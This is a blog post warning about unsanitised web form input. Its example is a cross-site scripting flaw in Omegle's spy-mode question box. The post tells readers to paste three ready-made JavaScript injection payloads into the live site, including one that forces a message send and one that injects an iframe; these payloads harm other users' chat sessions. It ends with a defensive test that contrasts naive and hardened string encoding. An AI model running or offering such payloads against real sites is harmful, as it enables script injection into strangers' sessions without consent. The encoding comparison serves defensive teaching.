The Importance of sanitising your user inputs

Inputting Raw User Data is Never a Good Idea

Unsanitized User Inputs can Lead to Awkward Code Injects

Morning, Internets.
So today let's talk about how important it is to completely distrust everyone on the internet and everything they say.
Specifically, I am talking about user inputs on web forms.
If you fail to sanitise the inputs you allow users to make, then you are a fool. You leave yourself open to all kinds of bad stuff, including but not limited to SQL injection and cross-site scripting (XSS).
A hard and fast rule: any time you give your users the chance to input data in any way, sanitise the shit out of it before it reaches a query, a page or a script.
The reason I chose to mention this today is that I came across a big website that has completely failed to do that and is being abused for the lulz.

Omegle.com is a well-known chat-roulette-style website that lets people chat with strangers on a random, ad-hoc basis.
Recently they introduced the option to suggest a question for two strangers to discuss whilst you watch.
Sadly they completely forgot to sanitise the input on the question-suggestion form, and absolute anarchy is ensuing…
For example:
This is what happens when you don't Sanitize your inputs

It's not just text: you can inject pretty much any code into the chat.
Another example here:
Rick Rolled

Simply head over to Omegle.com, select "Spy mode (beta)",
then paste the following into the question box:

\")); function l(x){return document.getElementsByClassName(x)[0];} l('chatmsg').value='YOUR MESSAGE HERE'; l('sendbtn').click();}catch( e ){} //

Or for a video:

\")); document.getElementsByClassName('logitem')[1].innerHTML='<iframe width="425" height="349" src="http://www.youtube.com/embed/yzC4hFK5P3g?autoplay=1">'; }catch( e ){} //

Or for any other code:
\")); document.getElementsByClassName('logitem')[1].innerHTML='INSERT CODE HERE'; }catch( e ){} //
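As an added example (my own code, not Omegle's): every payload above opens with \" to close a JavaScript string literal that the question text was pasted into, which is exactly what an encoder that escapes quotes but not backslashes lets through; that the site did something like this is my assumption from the payload shape. The template and the names showQuestion and flag below are hypothetical; the check runs the rendered script and reports whether the string arrived intact and whether anything else executed.

```javascript
// Added example, not Omegle's code. Models the bug described in the post:
// an untrusted "question" string is pasted into a JavaScript string literal
// inside an inline script. showQuestion and flag are hypothetical names.

// Naive encoder (assumed to resemble what the site did): escapes double
// quotes only. A value that starts with a backslash, like the payloads
// above, turns \" into \\" so the quote closes the literal early.
function naiveJsStringLiteral(s) {
  return '"' + String(s).replace(/"/g, '\\"') + '"';
}

// Hardened encoder: JSON.stringify escapes backslashes, quotes and control
// characters; the extra replacements cover characters that could still end
// an inline <script> block or terminate a JS string (U+2028/2029).
function safeJsStringLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The inline script a template would emit, with the encoder of your choice.
function renderQuestionScript(encode, question) {
  return 'try { showQuestion(' + encode(question) + '); } catch (e) {}';
}

// Defender's check: run the rendered script with a stub showQuestion and a
// flag object. A correct encoder delivers the original string unchanged and
// never lets any other statement execute.
function checkEncoder(encode, question) {
  const flag = { hit: false };
  let delivered;
  const src = renderQuestionScript(encode, question);
  new Function('showQuestion', 'flag', src)((v) => { delivered = v; }, flag);
  return { intact: delivered === question, escaped: flag.hit };
}

// Constructed probe in the shape of the page's payloads: close the literal,
// run one statement, close the try block, comment out the remainder.
const PROBE = '\\"); flag.hit = true; } catch (e) {} //';

console.log('naive:', checkEncoder(naiveJsStringLiteral, PROBE)); // intact false, escaped true
console.log('safe: ', checkEncoder(safeJsStringLiteral, PROBE));  // intact true, escaped false
```

Better still is not to build script from strings at all: put the question in the page as text (textContent, or a data attribute) and have the script read it from the DOM.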

Omegle you are fail (;_;)